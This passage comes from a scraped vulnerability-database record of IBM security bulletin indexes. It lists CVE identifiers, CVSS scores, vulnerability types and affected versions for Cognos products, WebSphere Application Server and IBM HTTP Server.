(CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Sever 2015Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Sever 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \nDecember 2014| [Vulnerability in SSLv3 affects Cognos Metrics Manager (CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21687710>) \nNovember 2014| [Cognos BI Server is affected by the following vulnerabilities: CVE-2014-0107, CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119, CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21682740>) \nSeptember 2014| [Cognos Business Intelligence is not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)](<http://www.ibm.com/support/docview.wss?uid=swg21685556>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following IBM Java Runtime vulnerabilities: CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21683527>) \nSeptember 2014| [Cognos Metrics Manager is affected by a vulnerability in Apache Xalan-Java (CVE-2014-0107)](<http://www.ibm.com/support/docview.wss?uid=swg21683524>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following Tomcat vulnerabilities: CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119](<http://www.ibm.com/support/docview.wss?uid=swg21683430>) \nSeptember 2014| [OpenSSL Heartbleed Vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21669823>) \nAugust 2014| [Cognos Metrics Manager is affected by the following OpenSSL vulnerabilities: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21677225>) \nJuly 2014| [Cognos BI Server is affected by the following OpenSSL vulnerability: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21680511>) \nJuly 2014| [Security vulnerabilities have been identified in IBM DB2 shipped with Cognos Business Intelligence (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21674489>) \nJuly 2014| [A security vulnerability has been identified in IBM WebSphere Application Server shipped with Cognos Business Intelligence (CVE-2014-0114)](<http://www.ibm.com/support/docview.wss?uid=swg21674099>) \nMay 2014| [Multiple security exposures in Cognos BI Server (CVE-2014- 0416, CVE-2014-0423, CVE-2013-4322)](<http://www.ibm.com/support/docview.wss?uid=swg21671340>) \nMarch 2014| [Multiple security exposures in Cognos BI Server (CVE-2013-6954, CVE-2013-6732, CVE-2013-5802, CVE-2013-5825, CVE-2014-0854, CVE-2014-0861)](<http://www.ibm.com/support/docview.wss?uid=swg21662856>) \nNovember 2013| [Cognos Business Intelligence (CVE-2013-3030, CVE-2013-4002, CVE-2013-2407, CVE-2013-2450, CVE-2013-4034, CVE-2013-5372)](<http://www.ibm.com/support/docview.wss?uid=swg21652590>) \n \n\\-->\n\n[{\"Product\":{\"code\":\"SSTSF6\",\"label\":\"IBM Cognos Analytics\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSEP7J\",\"label\":\"Cognos Business Intelligence\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"10.2;10.2.1;10.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-19T16:57:09", "type": "ibm", "title": "Security Bulletins - Cognos Analytics and Cognos Business Intelligence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5784", "CVE-2012-6153", "CVE-2013-2407", "CVE-2013-2450", "CVE-2013-3030", "CVE-2013-4002", "CVE-2013-4034", "CVE-2013-4322", "CVE-2013-5372", "CVE-2013-5802", "CVE-2013-5825", "CVE-2013-6732", "CVE-2013-6747", "CVE-2013-6954", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099", "CVE-2014-0107", "CVE-2014-0114", "CVE-2014-0119", "CVE-2014-0224", "CVE-2014-0227", "CVE-2014-0230", "CVE-2014-0423", "CVE-2014-0460", "CVE-2014-0854", "CVE-2014-0861", "CVE-2014-0878", "CVE-2014-0963", "CVE-2014-1568", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3577", "CVE-2014-4263", "CVE-2014-6145", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6457", "CVE-2014-6593", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187", "CVE-2014-8275", "CVE-2014-8730", "CVE-2014-8917", "CVE-2014-9495", "CVE-2015-0138", "CVE-2015-0159", "CVE-2015-0204", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0973", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1792", "CVE-2015-1819", "CVE-2015-2017", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-4000", "CVE-2015-4748", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-5312", "CVE-2015-5345", "CVE-2015-7450", "CVE-2015-7497", "CVE-2015-7498", "CVE-2015-7499", "CVE-2015-7500", "CVE-2015-7940", "CVE-2015-7941", "CVE-2015-7942", "CVE-2015-8035", "CVE-2015-8126", "CVE-2015-8241", "CVE-2015-8317", "CVE-2015-8472", "CVE-2015-8540", "CVE-2016-0201", "CVE-2016-0398", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-0729", "CVE-2016-0762", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2108", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2181", "CVE-2016-2183", "CVE-2016-3427", "CVE-2016-3485", "CVE-2016-3705", "CVE-2016-4447", "CVE-2016-4448", "CVE-2016-5983", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306", "CVE-2016-6816", "CVE-2016-8960"], "modified": "2018-07-19T16:57:09", "id": "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "href": "https://www.ibm.com/support/pages/node/568041", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T22:03:06", "description": "## Question\n\nIs there a list that contains the security bulletins that apply to WebSphere Application Server and IBM HTTP Server?\n\n## Answer\n\nThe following table is provided to help you locate WebSphere Application Server and IBM HTTP Server security bulletins. These are listed numerically by CVE number not by the last one published.\n\nNote the IBM Java runtime included with WebSphere Application Server provides an execution environment for non-IBM code. While the below table includes all IBM Java vulnerabilities related to the WebSphere Application Server product, there might be additional IBM Java vulnerabilities which impact non-IBM code running in your WebSphere Application Server environment. For a listing of all IBM Java security bulletins, refer to [_IBM Java Security Alerts_](<https://www.ibm.com/developerworks/java/jdk/alerts/>). To determine the Java SDK version used with WebSphere Application Server, refer to the [_Verify Java SDK version shipped with WebSphere Application Server_](<http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg27005002>).\n\nTo avoid preventable security issues, it is recommended that you stay up-to-date on the most current maintenance options for your products. You can also subscribe to the security bulletins for each of your products as provided in this link, [_IBM Security Bulletins_](<http://www.ibm.com/security/secure-engineering/bulletins.html>).\n\nWhen significant updates have been made to security bulletins, it will be noted with the date of the last update in the bulletin columns.\n\nNote: Starting 07/16/2020, the most recent fix published will be added to the top of this list below as well as in numerical order by year.\n\n**Recent CVEs (previous 15 published from most recent to least recent)**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2022-22477 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6603417>) | Not affected | 9.0,8.5 \n| CVE-2022-22473 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6603421>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2019-11777 | 7.5 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6602039>) | Not affected | Liberty \n| CVE-2022-22476 | 5.0 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6602015>) | Not affected | Liberty \n| CVE-2022-26377 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28614 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28615 | 6.5 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-29404 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-30556 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-31813 | 5.3 | Not affected | [Bypass Security](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-21496 | 5.3 | [IBM Java SDK for April 2022](<https://www.ibm.com/support/pages/node/6594523>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-21299 | 5.3 | [IBM Java SDK for April 2022](<https://www.ibm.com/support/pages/node/6594523>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-22365 | 5.6 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6587947>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22475 | 7.1 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6586734>) | Not affected | Liberty \n \n**2022 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2022-31813 | 5.3 | Not affected | [Bypass Security](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-30556 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-29404 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28615 | 6.5 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-28614 | 5.3 | Not affected | [Information Disclosure](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-26377 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6595149>) | 7.0,8.0,8.5,9.0 \n| CVE-2022-25315 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25313 | 5.5 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25236 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-25235 | 3.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6560814>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23990 | 9.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23852 | 9.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-23307 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-23305 | 6.5 | [SQL Injection](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-23302 | 8.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6557248>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2022-22827 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22826 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22825 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22824 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22823 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22822 | 7.8 | Not affected | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6559296>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22721 | 7.3 | Not affected | [Buffer Overflow](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22720 | 7.3 | Not affected | [HTTP Request Smuggling](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22719 | 5.3 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6565413>) | 9.0,8.5,8.0,7.0 \n| CVE-2022-22477 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6603417>) | Not affected | 9.0,8.5 \n| CVE-2022-22476 | 5.0 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6602015>) | Not affected | Liberty \n| CVE-2022-22475 | 7.1 | [Identity Spoofing](<https://www.ibm.com/support/pages/node/6586734>) | Not affected | Liberty \n| CVE-2022-22473 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6603421>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22393 | 3.1 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6585704>) | Not affected | Liberty \n| CVE-2022-22365 | 5.6 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6587947>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2022-22310 | 4.8 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6541530>) | Not affected | Liberty \n| CVE-2022-21496 | 5.3 | [IBM Java SDK for April 2022 CPU](<https://www.ibm.com/support/pages/node/6594523>) | | 9.0,8.5,Liberty \n| CVE-2022-21340 | 5.3 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2022-21229 | 5.3 | [IBM Java SDK for April 2022 CPU](<https://www.ibm.com/support/pages/node/6594523>) | | 9.0,8.5,Liberty \n \n**2021 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2021-46708 | 4.3 | [Clickjacking vulnerability](<https://www.ibm.com/support/pages/node/6569505>) | Not affected | Liberty \n| CVE-2021-46143 | 7.8 | Not affected | [Remote Code Execution](<https://Denial of Service>) | 7.0,8.0,8.5,9.0 \n| CVE-2021-45960 | 5.5 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6559296>) | 7.0,8.0,8.5,9.0 \n| CVE-2021-45105 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6538148>) | Not affected | 9.0, 8.5 \n| CVE-2021-45046 | 9.0 | [Denial of Service](<https://www.ibm.com/support/pages/node/6526750>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-44832 | 6.6 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6538148>) | Not affected | 9.0, 8.5 \n| CVE-2021-44790 | 9.8 | Not affected | [Buffer overflow](<https://www.ibm.com/support/pages/node/6540288>) | 9.0 \nLog4Shell | CVE-2021-44228 | 10 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6525706>) | Not affected | 9.0, 8.5 \n| CVE-2021-44224 | 8.2 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6540288>) | 9.0 \n| CVE-2021-40438 | 9.0 | Not affected | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6493841>) | 9.0 \n| CVE-2021-39275 | 3.7 | Not affected | [Buffer overflow](<https://www.ibm.com/support/pages/node/6493845>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-39038 | 4.4 | [Clickjacking vulnerability](<https://www.ibm.com/support/pages/node/6559044>) | Not affected | 9.0, Liberty \n| CVE-2021-39031 | 7.5 | [LDAP Injection](<https://www.ibm.com/support/pages/node/6550488>) | Not affected | Liberty \n| CVE-2021-38951 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6524674>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-36090 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6489683>) | Not affected | Liberty \n| CVE-2021-35603 | 3.7 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2021-35578 | 5.3 | [IBM Java SDK for October 2021 CPU](<https://www.ibm.com/support/pages/node/6520468>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2021-35564 | 5.3 | [IBM Java SDK for October 2021 CPU](<https://www.ibm.com/support/pages/node/6520468>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2021-35550 | 5.9 | [IBM Java SDK for January 2022 CPU](<https://www.ibm.com/support/pages/node/6559306>) | Not affected | 9.0,8.5,Liberty \n| CVE-2021-35517 | 5.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/6489683>) | Not affected | Liberty \n| CVE-2021-34798 | 5.9 | Not affected | [Denial of service](<https://www.ibm.com/support/pages/node/6493841>) | 9.0 \n| CVE-2021-30641 | 5.3 | Not affected | [Weaker Security](<https://www.ibm.com/support/pages/node/6464029>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-29842 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6489485>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-29754 | 4.2 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6462627>) | Not affected | 9.0, 8.5, 8.0. 7.0 \n| CVE-2021-29736 | 5.0 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6476678>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-26691 | 5.9 | Not affected | [Heap Buffer Overflow](<https://www.ibm.com/support/pages/node/6467651>) | 9.0 \n| CVE-2021-26690 | 3.7 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6467651>) | 9.0 \n| CVE-2021-26296 | 8.8 | [Cross-site request forgery](<https://www.ibm.com/support/pages/node/6441433>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2021-23450 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6558594>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-20517 | 6.4 | [Directory Traversal](<https://www.ibm.com/support/pages/node/6456955>) | Not affected | 9.0, 8.5 \n| CVE-2021-20492 | 6.5 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6456017>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2021-20480 | 4.3 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6441063>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2021-20454 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6445481>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-20453 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6445171>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2021-20354 | 5.9 | [Directory traversal](<https://www.ibm.com/support/pages/node/6415959>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2021-20353 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6413709>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2021-4104 | 8.1 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6526750>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2021-2369 | 4.3 | [IBM Java SDK for July 2021 CPU](<https://www.ibm.com/support/pages/node/6481135>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2021-2161 | 5.9 | [IBM Java SDK for April 2021 CPU](<https://www.ibm.com/support/pages/node/6454853>) | Not affected | 9.0, 8.5, Liberty \n \n**2020 CVEs**\n\n**Name 